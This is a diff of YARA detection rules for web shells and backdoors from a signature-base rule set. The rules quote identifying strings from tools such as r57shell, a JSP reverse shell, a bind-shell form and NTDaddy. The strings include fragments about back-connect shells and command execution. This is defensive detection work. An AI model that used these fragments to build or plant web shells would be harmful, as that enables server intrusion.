-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2274-L2294"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3724-L3738"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f507499304a7cf4d14a134a4c0781fed9a94c40fe3257a4168bacdf3910ffec"
-		score = 70
+		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
+		logic_hash = "5db224e4fe8608bb53f044ca6c0361dc66cadd58c6d4ea5ab4f8ae14ebde0e6e"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash4 = "655722eaa6c646437c8ae93daac46ae0"
-		hash5 = "9c94637f76e68487fa33f7b0030dd932"
 
 	strings:
-		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
-		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
+		$s0 = "ShellBOT"
+		$s1 = "PacktsGr0up"
+		$s2 = "CoRpOrAtIoN"
+		$s3 = "# Servidor de irc que vai ser usado "
+		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_404_Data_Suiyue
+rule SIGNATURE_BASE_Fuckphpshell_Php
 {
 	meta:
-		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "010db63b-ff72-5f97-8651-a1c7851471ff"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2295-L2311"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3739-L3752"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7f4ab5dbd2a72574c5d188e14ae98e599359b2d662266fc4c3a39d3d4405c208"
-		score = 70
+		hash = "554e50c1265bb0934fcc8247ec3b9052"
+		logic_hash = "0c993960b4ca880b818c7b7ba726479ed1c64c46ef8ca82d3c990d69ebe43f42"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
 
 	strings:
-		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
+		$s0 = "$succ = \"Warning! "
+		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
+		$s2 = "\\*=-- MEMBERS AREA --=*/"
+		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_R57Shell_R57Shell127_Sniper_SA_Shell_Egy_Spider_Shell_V2_R57_Xxx
+rule SIGNATURE_BASE_Ngh_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file ngh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "2d8ff3c1-d6b3-57ce-8213-232b376dbd05"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2312-L2337"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3753-L3767"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "04a58352202538d5446f1000c07341ea70434f00403f116233f335213687636e"
-		score = 70
+		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
+		logic_hash = "c794b216bafdaecf5bd138cc8c7552efbb8c3c571a441489d02a19793a4c294f"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ef43fef943e9df90ddb6257950b3538f"
-		hash1 = "ae025c886fbe7f9ed159f49593674832"
-		hash2 = "911195a9b7c010f61b66439d9048f400"
-		hash3 = "697dae78c040150daff7db751fc0c03c"
-		hash4 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash5 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash6 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash7 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash8 = "41af6fd253648885c7ad2ed524e0692d"
-		hash9 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s2 = "echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_name"
-		$s3 = "echo sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1"
-		$s9 = "echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size="
+		$s0 = "Cr4sh_aka_RKL"
+		$s1 = "NGH edition"
+		$s2 = "/* connectback-backdoor on perl"
+		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
+		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_807_A_Css_Dm_He1P_Jspspy_Xxx
+rule SIGNATURE_BASE_Jsp_Reverse_Jsp
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4953b230-4cd9-55d6-a3cb-8d3713e7fb0c"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2338-L2376"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3768-L3780"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb045425a9f519dd7bf028a7795b16b89768682f5850b6a4d45f0991bfeb6431"
-		score = 70
+		hash = "8b0e6779f25a17f0ffb3df14122ba594"
+		logic_hash = "bdd2db4c032b25faaaf3a3a8e769000013f643ecfcb8b0374165a244ad2162a6"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash3 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash4 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash5 = "d71716df5042880ef84427acee8b121e"
-		hash6 = "341298482cf90febebb8616426080d1d"
-		hash7 = "29aebe333d6332f0ebc2258def94d57e"
-		hash8 = "42654af68e5d4ea217e6ece5389eb302"
-		hash9 = "88fc87e7c58249a398efd5ceae636073"
-		hash10 = "4a812678308475c64132a9b56254edbc"
-		hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash12 = "344f9073576a066142b2023629539ebd"
-		hash13 = "32dea47d9c13f9000c4c807561341bee"
-		hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash15 = "6acc82544be056580c3a1caaa4999956"
-		hash16 = "6aa32a6392840e161a018f3907a86968"
-		hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash18 = "3ea688e3439a1f56b16694667938316d"
-		hash19 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash20 = "71097537a91fac6b01f46f66ee2d7749"
-		hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s1 = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var"
-		$s2 = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu"
-		$s3 = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i"
+		$s0 = "// backdoor.jsp"
+		$s1 = "JSP Backdoor Reverse Shell"
+		$s2 = "http://michaeldaw.org"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_201_3_Ma_Download
+rule SIGNATURE_BASE_Tool_Asp
 {
 	meta:
-		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Tool.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "e5e727bd-836b-5540-8755-40f37904bc03"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2377-L2396"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3781-L3794"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "14eccd07e7bef9d570f75fc4adc204d175dcfbb5b950bdb3e25a65d3c5bb0310"
-		score = 70
+		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
+		logic_hash = "d6bd782302b2c614fc572babb3825c0e1fcd0de5841ca8541ca27580ccc274d4"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
-		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
-		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
+		$s0 = "mailto:rhfactor@antisocial.com"
+		$s2 = "?raiz=root"
+		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
+		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Browser_201_3_400_In_Jfolder_Jfolder01_Jsp_Leo_Ma_Warn_Webshell_Nc_Download
+rule SIGNATURE_BASE_NT_Addy_Asp
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "18f5f360-8690-5e09-ac18-b8cc4f678811"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2397-L2424"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3795-L3807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bf0fd37b542c9362a47180ee03ea28995b48d483f72273e472292a320a3ddee"
-		score = 70
+		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
+		logic_hash = "0fc61d5e276786b8be822712cdcfc81146998e535532e44d3da92e0668713a48"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "36331f2c81bad763528d0ae00edf55be"
-		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash5 = "8979594423b68489024447474d113894"
-		hash6 = "ec482fc969d182e5440521c913bab9bd"
-		hash7 = "f98d2b33cd777e160d1489afed96de39"
-		hash8 = "4b4c12b3002fad88ca6346a873855209"
-		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash10 = "e9a5280f77537e23da2545306f6a19ad"
-		hash11 = "598eef7544935cf2139d1eada4375bb5"
-		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
-		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
+		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
+		$s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
+		$s4 = "RAW D.O.S. COMMAND INTERFACE"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2006_Arabicspy
+rule SIGNATURE_BASE_Simattacker___Vrsion_1_0_0___Priv8_4_My_Friend_Php
 {
 	meta:
-		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "8a34f4fd-337d-5eb4-b7b7-4adb1c2b7937"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2425-L2442"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3808-L3820"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bd9f1ffdbf94dd5a871fc7c3b31d2357e99265d02bfe1c836f82d251053dce7d"
-		score = 70
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+		logic_hash = "46bc4063d06b4af3e4e61e1e998d489e974e76f17363c9777b8afc39ff21f698"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "40a1f840111996ff7200d18968e42cfe"
-		hash2 = "e0202adff532b28ef1ba206cf95962f2"
 
 	strings:
-		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
-		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
+		$s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
+		$s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+		$s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_In_Jfolder_Jfolder01_Jsp_Leo_Warn
+rule SIGNATURE_BASE_Remexp_Asp
 {
 	meta:
-		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file RemExp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "900036ce-ff13-5441-bb77-906ea08a4ca0"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2443-L2463"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3821-L3833"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "00c3667438a688b990cf1c8bb6db52be7c6d1b36192dece4e8b07edda68f4b72"
-		score = 70
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+		logic_hash = "c7da9908a0252e95b47dbc8fbb36aeac1661dc464123aaca036bd51047a31584"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash1 = "8979594423b68489024447474d113894"
-		hash2 = "ec482fc969d182e5440521c913bab9bd"
-		hash3 = "f98d2b33cd777e160d1489afed96de39"
-		hash4 = "4b4c12b3002fad88ca6346a873855209"
-		hash5 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
-		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
+		$s0 = "<title>Remote Explorer</title>"
+		$s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
+		$s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_2_520_Icesword_Job_Ma1_Ma4_2
+rule SIGNATURE_BASE_Phvayvv_Php_Php
 {
 	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file phvayvv.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "76351a59-8f52-5110-a9b8-36edd59026df"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2464-L2486"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3834-L3846"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "765efb4f776d9ffe5dab1b5decbb60df654e1de9ab8ae7e0437c5c8f717642b9"
-		score = 70
+		hash = "35fb37f3c806718545d97c6559abd262"
+		logic_hash = "503a69a7e2c30cc82eba430082627bb93c459a95f675b968126bf4524c598863"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
-		hash3 = "56c005690da2558690c4aa305a31ad37"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
-		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
-		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
+		$s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
+		$s1 = "$baglan=fopen($duzkaydet,'w');"
+		$s2 = "PHVayv 1.0"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Phpspy_2005_Full_Phpspy_2005_Lite_PHPSPY
+rule SIGNATURE_BASE_Klasvayv_Asp
 {
 	meta:
-		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file klasvayv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "3ca4c20c-f879-55a0-9070-d40fc903f9ae"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2487-L2505"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3847-L3860"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "80c8e7b50aea91284a25ffd3a07d8705c24b6a95a58f42ec6043ececcff32dbb"
-		score = 70
+		hash = "2b3e64bf8462fc3d008a3d1012da64ef"
+		logic_hash = "eb1b11e02b075a4e7d28b77cf91ad596a85e4c697a36304ee177d46735965e75"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash2 = "0712e3dc262b4e1f98ed25760b206836"
 
 	strings:
-		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
-		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
-		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
+		$s1 = "set aktifklas=request.querystring(\"aktifklas\")"
+		$s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
+		$s3 = "<font color=\"#858585\">www.aventgrup.net"
+		$s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2006_Arabicspy_Hkrkoz
+rule SIGNATURE_BASE_R57Shell_Php_Php
 {
 	meta:
-		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file r57shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "1f1070e8-e82c-5cae-a64a-cd5028adae97"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2506-L2523"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3861-L3874"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "228e0a73f14da2957f75ae898fdbcf2386deb366df6ddc312162ab723bac44ba"
-		score = 70
+		hash = "d28445de424594a5f14d0fe2a7c4e94f"
+		logic_hash = "658eec4f3c463ec1a480bcb7ba995b8d81d1fb846832e569751d9f505f0fa87e"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "40a1f840111996ff7200d18968e42cfe"
-		hash2 = "e0202adff532b28ef1ba206cf95962f2"
-		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+		$s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
+		$s2 = "RusH security team"
+		$s3 = "'ru_text12' => 'back-connect"
+		$s4 = "<title>r57shell</title>"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Shell_Ci_Biz_Was_Here_C100_V_Xxx
+rule SIGNATURE_BASE_Rst_Sql_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2524-L2543"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3875-L3888"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ccc3cb553f7b5d089a43612d48522cc4a66b4a8ab433321ae1a716a8fa57b62c"
-		score = 70
+		hash = "0961641a4ab2b8cb4d2beca593a92010"
+		logic_hash = "d15cf69d9ad8683d2ac1ff09b08b0b26ecaf35df8e45bbd5c3a02c393f88cb34"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "f2fa878de03732fbf5c86d656467ff50"
-		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash5 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
+		$s0 = "C:\\tmp\\dump_"
+		$s1 = "RST MySQL"
+		$s2 = "http://rst.void.ru"
+		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_2008_2009Lite_2009Mssql
+rule SIGNATURE_BASE_Wh_Bindshell_Py
 {
 	meta:
-		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "b7acbfe7-fd28-5832-9af2-1c5befe4bbab"
